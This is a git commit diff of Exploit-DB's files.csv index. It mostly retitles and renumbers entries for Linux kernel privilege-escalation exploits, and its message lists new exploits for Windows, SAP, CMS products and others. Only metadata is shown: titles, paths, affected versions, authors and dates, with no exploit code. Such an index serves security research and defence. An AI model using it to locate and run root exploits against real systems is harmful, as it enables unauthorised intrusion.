DB: 2016-06-22
14 new exploits Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit (2) Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1) Linux Kernel <= 2.4.29-rc2 - uselib() Privilege Elevation Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1) Linux Kernel 2.4 - uselib() Privilege Elevation Exploit Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2) Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3) Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2) Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1) Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2) Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1) Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3) Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1) Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2) Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2) Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3) Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3) Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability (4) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation Linux Kernel <= 2.6.37 - Local Kernel Denial of Service Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1) Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1) Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1) Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service Vulnerability Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1) Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' Vulnerability (1) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1) Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1) Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2) Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept (1) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with 'CONFIG_X86_X32' Exploit (2) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit (3) Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3) Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3) Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2) Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1) Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2) DarkComet Server Remote File Download Exploit (msf) Banshee 2.6.2 - .mp3 Crash PoC IonizeCMS 1.0.8 - (Add Admin) CSRF Yona CMS - (Add Admin) CSRF Joomla Publisher Pro (com_publisher) Component - SQL Injection Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074) Linux - ecryptfs and /proc/$pid/environ Privilege Escalation Windows - Custom Font Disable Policy Bypass Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063) SAP NetWeaver AS JAVA 7.1 - 7.5 - ctcprotocol Servlet XXE SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities YetiForce CRM < 3.1 - Persistent XSS
This commit is contained in:
parent
da158cde92
commit
0fe9b46f79
16 changed files with 1801 additions and 63 deletions
113
files.csv
113
files.csv
|
@ -126,7 +126,7 @@ id,file,description,date,author,platform,type,port
|
|||
127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0
|
||||
129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0
|
||||
130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
|
||||
131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0
|
||||
131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0
|
||||
132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80
|
||||
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80
|
||||
134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0
|
||||
|
@ -136,11 +136,11 @@ id,file,description,date,author,platform,type,port
|
|||
138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
|
||||
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
|
||||
140,platforms/linux/local/140.c,"Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
|
||||
141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0
|
||||
142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
|
||||
141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0
|
||||
142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
|
||||
143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
|
||||
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
|
||||
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0
|
||||
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
|
||||
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
|
||||
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
|
||||
148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
|
||||
|
@ -154,7 +154,7 @@ id,file,description,date,author,platform,type,port
|
|||
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
|
||||
158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
|
||||
159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
|
||||
160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit",2004-03-01,"Paul Starzetz",linux,local,0
|
||||
160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0
|
||||
161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0
|
||||
163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,N/A,windows,remote,0
|
||||
164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0
|
||||
|
@ -574,7 +574,7 @@ id,file,description,date,author,platform,type,port
|
|||
741,platforms/linux/local/741.pl,"HTGET <= 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0
|
||||
742,platforms/windows/dos/742.c,"Gore <= 1.50 - Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0
|
||||
743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 - Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0
|
||||
744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 - uselib() Privilege Elevation",2005-01-07,"Paul Starzetz",linux,local,0
|
||||
744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1)",2005-01-07,"Paul Starzetz",linux,local,0
|
||||
745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
|
||||
746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
|
||||
749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
|
||||
|
@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
|
|||
774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
|
||||
775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947
|
||||
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
|
||||
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit",2005-01-27,"Tim Hsu",linux,local,0
|
||||
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
|
||||
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
|
||||
780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
|
||||
781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80
|
||||
|
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
|
|||
891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0
|
||||
892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0
|
||||
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
|
||||
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0
|
||||
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
|
||||
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
|
||||
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
|
||||
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
|
||||
|
@ -4729,8 +4729,8 @@ id,file,description,date,author,platform,type,port
|
|||
5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 (index.php page) Local File Inclusion Vulnerability",2008-02-09,Houssamix,php,webapps,0
|
||||
5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
|
||||
5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
|
||||
5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit",2008-02-09,qaaz,linux,local,0
|
||||
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit",2008-02-09,qaaz,linux,local,0
|
||||
5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0
|
||||
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
|
||||
5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0
|
||||
5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0
|
||||
5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0
|
||||
|
@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
|
|||
8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
|
||||
8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
|
||||
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
|
||||
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
|
||||
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
|
||||
8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
|
||||
8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
|
||||
|
@ -8077,7 +8077,7 @@ id,file,description,date,author,platform,type,port
|
|||
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
|
||||
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
|
||||
8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0
|
||||
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
|
||||
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)",2009-04-30,"Jon Oberheide",linux,local,0
|
||||
8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0
|
||||
8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
8577,platforms/php/webapps/8577.txt,"leap CMS 0.1.4 - (SQL/XSS/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
|
@ -8899,8 +8899,8 @@ id,file,description,date,author,platform,type,port
|
|||
9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
|
||||
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
|
||||
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
|
||||
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
|
||||
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
|
||||
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
|
||||
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
|
||||
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
|
||||
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0
|
||||
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
|
||||
|
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
|
|||
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
|
||||
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
|
||||
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
|
||||
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
|
@ -8984,7 +8984,7 @@ id,file,description,date,author,platform,type,port
|
|||
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
|
||||
9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
|
||||
9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
|
||||
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
|
||||
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
|
||||
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (bSQL/LFI) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
|
||||
|
@ -9004,8 +9004,8 @@ id,file,description,date,author,platform,type,port
|
|||
9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
|
||||
